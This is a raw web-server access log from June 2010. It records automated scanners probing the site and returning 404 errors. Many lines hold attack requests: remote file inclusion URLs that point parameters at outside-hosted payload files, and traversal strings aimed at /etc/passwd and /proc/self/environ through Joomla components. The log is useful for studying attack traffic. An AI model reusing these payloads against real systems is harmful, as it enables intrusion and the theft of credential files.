89.188.107.54 - - [01/Jun/2010:00:58:04 -0500] "GET //encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:58:04 -0500] "GET /logs/access_log.1270512000//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:58:04 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:58:21 -0500] "GET /logs/access_log.1272585600//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.204.207 - - [01/Jun/2010:01:04:33 -0500] "GET /logs/access_log.1271462400 HTTP/1.1" 200 716852 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
207.46.13.52 - - [01/Jun/2010:01:05:55 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.174.120.20 - - [01/Jun/2010:01:08:45 -0500] "GET /logs/access_log.1232668800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 342 "-""libwww-perl/5.831"
93.174.120.20 - - [01/Jun/2010:01:08:45 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 315 "-""libwww-perl/5.831"
93.174.120.20 - - [01/Jun/2010:01:08:47 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 320 "-""libwww-perl/5.831"
61.67.240.189 - - [01/Jun/2010:01:09:36 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:01:09:36 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
118.129.166.213 - - [01/Jun/2010:01:12:10 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:01:12:11 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:01:12:22 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:01:12:56 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
200.61.185.200 - - [01/Jun/2010:01:15:48 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:01:15:49 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
122.112.32.51 - - [01/Jun/2010:01:16:35 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:16:37 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:16:37 -0500] "GET /logs/access_log.1271548800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.46.13.132 - - [01/Jun/2010:01:17:55 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.112.32.51 - - [01/Jun/2010:01:18:36 -0500] "GET /logs/access_log.1272067200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
80.246.53.20 - - [01/Jun/2010:01:21:32 -0500] "GET /logs/access_log.1271376000//newspublish/include.php?path%5Bdocroot%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
80.246.53.20 - - [01/Jun/2010:01:21:32 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
80.246.53.20 - - [01/Jun/2010:01:21:32 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
91.121.180.195 - - [01/Jun/2010:01:22:06 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:22:06 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:22:07 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:22:07 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
207.46.204.231 - - [01/Jun/2010:01:22:26 -0500] "GET /logs/access_log.1177372800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.79.130 - - [01/Jun/2010:01:22:46 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:22:46 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:22:46 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:22:47 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:27 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:27 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:27 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:27 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:29 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:29 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:30 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:23:30 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
207.46.204.197 - - [01/Jun/2010:01:23:56 -0500] "GET /logs/access_log.1199491200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.180.195 - - [01/Jun/2010:01:24:16 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:16 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:16 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:16 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:35 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:35 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:35 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:24:35 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
174.121.79.130 - - [01/Jun/2010:01:24:39 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:39 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:40 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:41 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:49 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:49 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:24:49 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
207.46.194.122 - - [01/Jun/2010:01:25:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.122 - - [01/Jun/2010:01:25:06 -0500] "GET /rachel%20study/rachel-saint3.jpg HTTP/1.1" 404 314 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
174.121.79.130 - - [01/Jun/2010:01:25:23 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:23 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:23 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:27 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:27 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:27 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:58 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:58 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:25:58 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:26:00 -0500] "GET /logs/access_log.1274572800//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 319 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:26:01 -0500] "GET //cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:26:01 -0500] "GET /logs//cok.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.61.185.200 - - [01/Jun/2010:01:27:02 -0500] "GET /logs/access_log.1274227200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:01:27:02 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.61.185.200 - - [01/Jun/2010:01:27:03 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
93.114.41.16 - - [01/Jun/2010:01:27:15 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
174.121.79.130 - - [01/Jun/2010:01:28:24 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:28:24 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:28:29 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:28:29 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.180.195 - - [01/Jun/2010:01:28:37 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:28:37 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:28:39 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:28:39 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:29:03 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:29:04 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.121.79.130 - - [01/Jun/2010:01:29:52 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:29:52 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:05 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:05 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:05 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:06 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:14 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.79.130 - - [01/Jun/2010:01:30:14 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
122.112.32.51 - - [01/Jun/2010:01:35:19 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:35:19 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:35:19 -0500] "GET /logs/access_log.1271116800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:46:28 -0500] "GET /logs/access_log.1272240000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:46:40 -0500] "GET /logs/access_log.1271376000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:36 -0500] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:36 -0500] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:36 -0500] "GET /logs/access_log.1273363200///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:38 -0500] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:38 -0500] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:38 -0500] "GET /logs/access_log.1273363200///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:45 -0500] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:45 -0500] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:47:45 -0500] "GET /logs/access_log.1273363200///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.251.10.117 - - [01/Jun/2010:01:47:57 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.251.10.117 - - [01/Jun/2010:01:47:57 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.110.132.7 - - [01/Jun/2010:01:48:02 -0500] "GET /logs/access_log.1274832000///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:48:02 -0500] "GET /logs/access_log.1274832000///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:01:48:04 -0500] "GET /logs/access_log.1274832000///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
76.73.80.242 - - [01/Jun/2010:01:50:14 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.73.80.242 - - [01/Jun/2010:01:50:14 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.73.80.242 - - [01/Jun/2010:01:50:14 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
